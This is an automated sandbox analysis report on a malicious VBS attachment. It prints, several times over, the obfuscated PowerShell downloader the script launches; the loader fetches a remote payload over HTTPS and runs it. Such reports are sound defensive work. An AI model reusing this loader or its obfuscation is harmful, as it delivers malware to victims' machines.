              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nigrosins)), $Grassmen).DefineDynamicModule($Twattler, $false).DefineType($Micros, $Beholdningens, [System.MulticastDelegate])$Scholas
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CEC00BD pushad ; iretd 4_2_00007FFE7CEC00C1
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4439Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5478Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6123Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3639Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: PING.EXE, 00000002.00000002.1365150966.00000263F3269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1525972430.000002D2E93FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: amsi64_7608.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7852, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud 
';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$cJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#hogherd chimariko colonizabilities sternebra #>;$outdoorsy='familienavnets';<#durum startelementernes clangorously substantify starthullernes #>;$programmeringssprogets=$wane+$host.ui; function tollhouse($lao){if ($programmeringssprogets) {$abasements++;}$vaticinating=$aaremaalsstillingers48+$lao.'length'-$abasements; for( $nonlinear228=4;$nonlinear228 -lt $vaticinating;$nonlinear228+=5){$humanlike=$nonlinear228;$betting+=$lao[$nonlinear228];$erantissenes='chefassistenters';}$betting;}function profitmagere($shoetrees){ . ($forstbotanikker) ($shoetrees);}$skubbe=tollhouse 'forlmanagoslngzf reiprosl eeklgodvadjel/land ';$gangava=' bef[milincuare ddbt ige.gemashis,e pharmuldv ielievenc bi,e .ejp adolikiidensnrelotsnigmmenyainfrn s.iatemegbo reinkardodo]mads:nona: regsr,tueranucs nkufor ruddais nhtunavy k npo.dirdentomedltsve oredncstopode ol tro mini=be,p ';$skubbe+=tollhouse 'f,ib5 es.over0lukk pal.(op pw i filoxinpe sd arkomicrwvivisudes ,onngalltmoan tids1pre.0 tem.in,e0ll b;nost in ewstriisheencray6pr s4hel ;vand nitwxlini6 sk 4 ude; ev gerwennvukri:tryk1taco3yttr1cler.klde0up r)stor ogig useor.ac hokteguoluft/ kl 2afbi0opru1,hul0hydr0giav1soll0sign1l.ig rec fha.di polrslebebe ifr poobagaxaf e/toyl1euda3 ta.1.ran.ko.k0e bl ';$gangava+='sole[prognweeveufortquin.goneselskedialcintruaflnrferrivelotinteyde eppo wrholko statlineo skrcsurpoc,rolddmatmaliyeurypmonke pri]inbu ';$dendrochronologically=tollhouse 'bofoubr.es foregrovr egl- hvearesmg an.e ,lunla nt .nd ';$galvanism=tollhouse 'be,rhvejatconstes.hpt.rssgrun:fred/parm/ p idreklelithsrubie.nteualsirker iudsp-enear desooptimbiv.amelanb goib,viatils.,assrbestotraf/aro bwambe stonovern abnimeten r cgudnatoverogro.npara.umisj b.lpoverbafst ';$play=tollhouse ' org>dec, ';$forstbotanikker=tollhouse ' unligenoe locx gud 
';$relais20='cruzieros';$gangava+='fora: por:unidtundilbrugsbril1la i2rm.u ';$resurgence='\ghastily.kri';profitmagere (tollhouse 'samm$w lfg lenlpustofluob h na klilvolt:ethebforea,urvlfa csrepraev.cmsectevandrtakeimadon ighgi teepre r psyna pee igg=ano,$ aceeforknstatvdokt:stata ommpfathphabednodaafangtspina cen+afve$pha r unrea.rispalaustr,r au.g us epat ns.cickogee e e ');profitmagere (tollhouse ' dei$.ilfg a.al irnositabfrenastemlinte:deflhoxidobesvrzimmm b oourannopgaesgne=halv$antig preas eellinivunmeaconsn meaibib,sfornmg,og.intestr gpstiglven.i rustarth(a.ti$skdyp isclretsaroseymini)an e ');profitmagere (tollhouse $gangava);$galvanism=$hormone[0];$flugtet=(tollhouse 'tall$retsgirreldepro pobinteaunsul sub:ulopbgen.o bligpa.agpu natidlr losts ak=fraanpulse,eltwmo.i- bomofjedb ankj f.oeafkrcv,detopgr v.ndsge,nysa issno tautoematrmno t. forn,eace atathaem.outiwanatedigrb regcenoplfi,gical e st no ertwund ');profitmagere ($flugtet);profitmagere (tollhouse ' po $ ,ubbruino,pelgs.ydgrh daa tir ieltvauq. mirhadvieha vana ad obeeindsr,alsslati[fled$c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs | 3% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
